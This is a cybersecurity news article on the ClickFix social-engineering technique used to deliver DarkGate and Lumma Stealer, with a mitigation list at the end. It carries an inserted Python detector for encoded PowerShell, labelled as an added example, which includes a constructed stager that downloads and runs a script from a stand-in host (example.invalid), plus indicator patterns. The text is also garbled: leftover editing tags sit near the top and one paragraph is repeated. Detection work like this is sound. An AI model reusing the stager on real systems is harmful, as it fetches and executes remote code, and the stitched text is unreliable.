CyberSecurity SEE

ClickFix Technique Utilized To Deploy DarkGate And Lumma Stealer

Researchers have recently documented a malware delivery method known as “ClickFix.” Rather than exploiting a software vulnerability, it abuses user trust: compromised websites are used to lure visitors into running a script themselves, and that script delivers one of two malware families, DarkGate or Lumma Stealer. Because the victim, not an exploit, executes the first stage, the technique can lead to a full compromise of the affected system while sidestepping controls that only inspect attachments or downloads.

The chain begins when a compromised website redirects an unsuspecting visitor to an attacker-controlled domain that displays a fake popup window. The popup, styled as an error message or a “fix” prompt, instructs the visitor to copy a command and paste it into a PowerShell terminal; by doing so, the visitor unknowingly starts the malware delivery process.
</gra_replace>
<gr_replace lines="11" cat="clarify" orig="Once users follow">
Once the user pastes the base64-encoded command into PowerShell, it decodes to instructions that download the next stage from a remote, attacker-controlled server and execute it. The payload runs under the victim's own account and from a process the victim started, which is what gives the threat actors their initial access to the system.

Once users follow the instructions and paste the base64-encoded commands into the PowerShell terminal, the malware is downloaded and executed from remote attacker-controlled servers. This method allows the threat actors to gain access to the compromised systems and carry out malicious activities.

The ClickFix lure is simple but highly effective, because it turns the victim into the delivery mechanism. Once the malware is running, it uses various techniques to evade detection and maintain persistence, then steals sensitive data from the user and sends it to a command and control (C2) server.

Researchers have examined how DarkGate and Lumma Stealer each use the ClickFix technique. DarkGate is distributed through phishing emails carrying HTML attachments disguised as Microsoft Word documents. When the attachment is opened, the user is prompted to click a “How to fix” button, which reveals base64-encoded commands that conceal the malicious PowerShell instructions. Once running, DarkGate can download and execute additional payloads, giving the threat actors remote access and the ability to exfiltrate data.

Lumma Stealer follows the same pattern from a different starting point. Visitors to compromised websites are shown error messages claiming a browser problem and are instructed to enter base64-encoded commands into a PowerShell terminal. Running those commands executes Lumma Stealer, bypassing security measures that rely on catching a malicious file before the user opens it.
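The detection side of the chain described above, as an added example that is not part of the original article and not tooling from the researchers it cites: the script pulls base64 blobs out of process-creation command lines (both the `-EncodedCommand` form and stagers hidden in an inline `FromBase64String` literal), decodes them, and flags download-and-execute indicators. The log format, the sample lines, the stager text and the `example.invalid` URL are all constructed for the example.

```python
"""Flag ClickFix-style encoded PowerShell in process-creation logs.

Added example, not code from the article or the researchers it cites. It
assumes a constructed, simplified log format of the form
"<timestamp> user=<user> parent=<image> cmd=<command line>"; the sample lines,
the stager text and the example.invalid URL are all invented for illustration.
"""
import base64
import binascii
import re
from typing import List, Optional

# Hypothetical log format used by the constructed samples below.
LOG_RE = re.compile(r"^(?P<ts>\S+) user=(?P<user>\S+) parent=(?P<parent>\S+) cmd=(?P<cmd>.*)$")
# powershell.exe -EncodedCommand / -enc / -ec / -e <base64 of a UTF-16LE script>
ENC_ARG_RE = re.compile(r"(?i)(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})")
# Stager hidden as an inline literal: [Convert]::FromBase64String('....')
INLINE_B64_RE = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)", re.I)

# Download-and-execute indicators, matched against the visible command line
# (with base64 blobs blanked out) and against every decoded layer.
INDICATOR_PATTERNS = {
    "invoke-expression": r"\biex\b|invoke-expression",
    "download": r"downloadstring|downloadfile|invoke-webrequest|net\.webclient|\biwr\b|\bcurl\b|bitsadmin",
    "hidden-window": r"-w(?:indowstyle)?\s+hidden",
    "nested-base64": r"frombase64string",
    "mshta": r"\bmshta\b",
}


def encode_ps(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_blob(blob: str) -> Optional[str]:
    """Decode a base64 blob as UTF-16LE (-EncodedCommand) or, failing that, as UTF-8."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    # UTF-16LE text made of ASCII has a NUL in every odd byte position.
    if len(raw) >= 2 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def analyze_command(cmd: str) -> dict:
    """Extract and decode base64 payloads from one command line and score it."""
    blobs = ENC_ARG_RE.findall(cmd) + INLINE_B64_RE.findall(cmd)
    decoded = [d for d in (decode_blob(b) for b in blobs) if d is not None]
    visible = cmd
    for blob in blobs:  # blank the blobs so random base64 cannot match an indicator
        visible = visible.replace(blob, "<b64>")
    haystack = " ".join([visible, *decoded]).lower()
    hits = sorted(name for name, pat in INDICATOR_PATTERNS.items() if re.search(pat, haystack))
    # One indicator alone (e.g. a plain curl download) is normal; an encoded
    # payload that carries any indicator, or two indicators together, is not.
    suspicious = len(hits) >= 2 or (bool(decoded) and bool(hits))
    return {"decoded": decoded, "indicators": hits, "suspicious": suspicious}


def scan_logs(lines: List[str]) -> List[dict]:
    """Return one finding per log line whose command looks like a ClickFix stager."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        result = analyze_command(m["cmd"])
        if result["suspicious"]:
            findings.append({"ts": m["ts"], "user": m["user"], "parent": m["parent"], **result})
    return findings


# Constructed stager text (illustrative; example.invalid is a reserved TLD, nothing is fetched).
CLICKFIX_SCRIPT = "$u='http://example.invalid/fix.txt';iex (New-Object Net.WebClient).DownloadString($u)"

# Constructed log lines: one benign PowerShell run, the two encoded forms the
# article describes, and a legitimate download that must not be flagged.
SAMPLE_LOGS = [
    "2024-06-14T10:02:11Z user=alice parent=explorer.exe cmd=powershell.exe -NoProfile -Command Get-Date",
    "2024-06-14T10:05:43Z user=alice parent=explorer.exe cmd=powershell.exe -w hidden -enc " + encode_ps(CLICKFIX_SCRIPT),
    "2024-06-14T10:07:02Z user=bob parent=chrome.exe cmd=powershell.exe -nop -c \"iex([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
    + base64.b64encode(CLICKFIX_SCRIPT.encode()).decode("ascii") + "')))\"",
    "2024-06-14T10:09:30Z user=svc-build parent=cmd.exe cmd=curl.exe -sL https://example.invalid/artifact.zip -o build.zip",
]

if __name__ == "__main__":
    for f in scan_logs(SAMPLE_LOGS):
        print(f"{f['ts']} {f['user']} via {f['parent']}: {', '.join(f['indicators'])}")
        for payload in f["decoded"]:
            print("    decoded:", payload)
```

The decoded layer matters more than the visible one: an `-enc` blob looks like noise to a substring match, so the rule decodes first and then scores, and it blanks the blob out of the visible command so that random base64 characters cannot produce a false indicator hit. A single download indicator on its own (the `curl.exe` line) is deliberately left unflagged; a user-launched PowerShell that both fetches and evaluates remote content is the pattern the article describes.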

To counter the ClickFix technique and mitigate the risks posed by DarkGate and Lumma Stealer, researchers recommend several preventive measures:

– Conduct regular training on social engineering and phishing, including the specific ClickFix lure: no legitimate website or document will ask a user to paste a command into PowerShell to “fix” an error.
– Deploy antivirus or endpoint detection and response software on all endpoints.
– Implement email and web filtering to block malicious attachments and compromised or redirecting domains.
– Deploy firewalls and intrusion detection/prevention systems to monitor and block malicious traffic, including the download of the second stage from attacker-controlled servers.
– Segment networks to limit the spread of malware from an infected endpoint.
– Monitor network traffic and endpoint logs, including process creation and PowerShell script block logs, for suspicious activity such as base64-encoded PowerShell commands.
– Enforce the principle of least privilege so that a script run by a user cannot install system-wide persistence.
– Implement security policies to monitor clipboard content, since the lure depends on the victim copying a command from a web page or attachment.
– Enable multi-factor authentication so that credentials stolen by an infostealer are not enough on their own to access accounts.
– Keep operating systems and software up to date with security patches.
– Encrypt stored data to prevent unauthorized access.
– Perform regular and secure backups of critical data.

By following these recommendations and staying vigilant against social engineering tactics, organizations can enhance their cybersecurity posture and minimize the risk of falling victim to malware attacks like DarkGate and Lumma Stealer.
